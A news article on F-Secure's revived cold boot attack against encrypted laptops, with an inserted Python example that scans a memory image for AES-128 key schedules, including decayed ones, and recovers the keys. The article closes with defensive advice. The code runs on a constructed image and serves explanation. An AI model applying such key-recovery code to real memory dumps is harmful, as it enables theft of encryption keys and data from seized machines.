Researchers bring back cold boot attacks on modern computers

Doris Richards
September 16, 2018

Within minutes, the attackers can reportedly move past the security layers of a Windows or Mac PC to steal data, even if its disk is fully encrypted. Cold boot attacks target the contents of a computer's RAM, where sensitive data such as encryption keys lingers briefly after power is cut and the machine is forcibly rebooted.

"It's not exactly easy to do, but it's not a hard enough issue to find and exploit for us to ignore the probability that some attackers have already figured this out", said F-Secure Principal Security Consultant Olle Segerdahl, one of the researchers.

Cold boot attacks have been public since 2008 and involve recovering information still held in the RAM of a computer that hasn't been shut down properly, or that has been left in sleep mode, where memory stays powered and its contents stay in place.

Segerdahl and his F-Secure colleague Pasi Saarinen developed a tool that rewrites the firmware's stored settings, disabling the memory overwrite that is meant to defeat the attack and allowing them to boot from an external device that can read the target system's memory.

Over the years, OS makers and hardware vendors have shipped measures to blunt cold boot attacks. The main one, the Trusted Computing Group's Reset Attack Mitigation, has the firmware overwrite RAM on boot whenever the operating system has flagged that secrets may still be in memory.

"It's the kind of thing that attackers looking for bigger phish, like a bank or large enterprise, will know how to use", he added.

The attack exploits the fact that the firmware settings governing the boot process are not protected against manipulation by an attacker with physical access to the machine.

But the F-Secure researchers found a way to bypass that memory overwrite by additionally attacking the BIOS/UEFI firmware that boots the machine and performs it: once the firmware's settings are rewritten to disable the overwrite and permit booting from external media, a forced reboot leaves the contents of RAM intact.

The attacker then plugs in a USB stick carrying a Linux system, boots the machine from it and dumps the contents of RAM, recovering whatever the previous session left there, such as disk encryption keys.
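What the attacker does with that RAM dump is the part the article leaves implicit. The following is an added example, not code from the article or from F-Secure's tool: it applies the key-schedule search described by Halderman et al. in the 2008 cold boot paper. An AES key in memory almost always sits next to its expanded key schedule, so every 16-byte window of the image is treated as a candidate key, expanded, and compared with the 160 bytes that follow it. The memory image here is constructed (random filler with two planted schedules, one of them with a few bytes flipped to mimic RAM decay); the key values and the tolerance parameter are the example's own assumptions.

```python
"""Recover AES-128 keys from a memory image by key-schedule search.

Added example, not the article's or F-Secure's code. The image below is
constructed: pseudo-random filler with two AES-128 key schedules planted in
it, one intact and one with three bytes flipped to stand in for RAM decay.
"""
import random

def _gf_mul(a, b):
    """Multiply in GF(2^8) with the AES polynomial x^8+x^4+x^3+x+1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = (a << 1) ^ (0x11B if a & 0x80 else 0)
        b >>= 1
    return r

def _build_sbox():
    """Derive the AES S-box (FIPS-197 5.1.1) rather than hard-code 256 bytes."""
    inv = [0] * 256
    for x in range(1, 256):
        inv[x] = next(y for y in range(1, 256) if _gf_mul(x, y) == 1)
    def rotl(v, n):
        return ((v << n) | (v >> (8 - n))) & 0xFF
    return [b ^ rotl(b, 1) ^ rotl(b, 2) ^ rotl(b, 3) ^ rotl(b, 4) ^ 0x63
            for b in inv]

SBOX = _build_sbox()
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]

def _schedule_core(prev_word, round_no):
    """RotWord, SubWord and Rcon applied to the last word of a round key."""
    t = list(prev_word[1:]) + [prev_word[0]]
    t = [SBOX[b] for b in t]
    t[0] ^= RCON[round_no - 1]
    return t

def expand_key_128(key):
    """FIPS-197 key expansion: 16-byte key -> 176-byte schedule (11 round keys)."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    for i in range(4, 44):
        t = _schedule_core(w[i - 1], i // 4) if i % 4 == 0 else w[i - 1]
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
    return bytes(b for word in w for b in word)

def find_aes128_keys(image, max_bad_bytes=0):
    """Return [(offset, key)] for windows whose expansion matches what follows them.

    max_bad_bytes tolerates that many mismatches among the 160 derived bytes;
    a real cold-boot dump has bit decay, so an exact match would miss keys.
    """
    hits = []
    for off in range(len(image) - 175):
        key = image[off:off + 16]
        # Cheap filter: derive only the first word of round 1 before a full expansion.
        first = bytes(a ^ b for a, b in zip(key[:4], _schedule_core(key[12:16], 1)))
        if sum(a != b for a, b in zip(first, image[off + 16:off + 20])) > max_bad_bytes:
            continue
        derived = expand_key_128(key)[16:]
        bad = sum(a != b for a, b in zip(derived, image[off + 16:off + 176]))
        if bad <= max_bad_bytes:
            hits.append((off, key))
    return hits

# Constructed 8 KiB memory image (assumed layout, not a real dump).
FIPS_KEY = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")  # FIPS-197 A.1 test key
SECOND_KEY = bytes(range(0x10, 0x20))                          # arbitrary second key
_rng = random.Random(2018)
_img = bytearray(_rng.getrandbits(8) for _ in range(8192))
_img[0x1000:0x1000 + 176] = expand_key_128(FIPS_KEY)           # intact schedule
_decayed = bytearray(expand_key_128(SECOND_KEY))
for _pos in (40, 97, 150):                                     # three decayed bytes
    _decayed[_pos] ^= 0x01
_img[0x1800:0x1800 + 176] = _decayed
MEMORY_IMAGE = bytes(_img)

if __name__ == "__main__":
    for tolerance in (0, 3):
        for off, key in find_aes128_keys(MEMORY_IMAGE, tolerance):
            print(f"tolerance={tolerance} offset=0x{off:04x} key={key.hex()}")
```

With the tolerance at 0 only the intact schedule is found; raising it to 3 also recovers the decayed one, which is why production tools score each candidate by Hamming distance instead of demanding an exact match. The same scan works on a disk-encryption driver's key material because the driver keeps the expanded schedule resident for performance, which is exactly what the memory overwrite on reboot is supposed to destroy.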

Segerdahl also added that there's no reliable way for organisations to know their data is safe if a computer goes missing, and because almost all company laptops will have things like access credentials for corporate networks, it gives attackers a consistent and reliable way to compromise corporate targets. "There's no easy fix for this issue either, so it's a risk that companies are going to have to address on their own".

The researchers said that they have warned major companies such as Microsoft, Apple, and Intel about their latest findings. The cybersecurity company recommends that you configure your laptops to automatically shut down or hibernate instead of entering sleep mode when you close the lid: a hibernated or powered-off machine holds no keys in RAM, whereas a sleeping one keeps memory powered with the keys still in it. Educating workers, especially executives and employees who travel, about cold boot attacks and similar threats is also important. "IT security and incident response teams should rehearse this scenario and make sure that the company's workforce knows to notify IT immediately if a device is lost or stolen", says Segerdahl. "We encourage customers to practice good security habits, including preventing unauthorized physical access to their device".
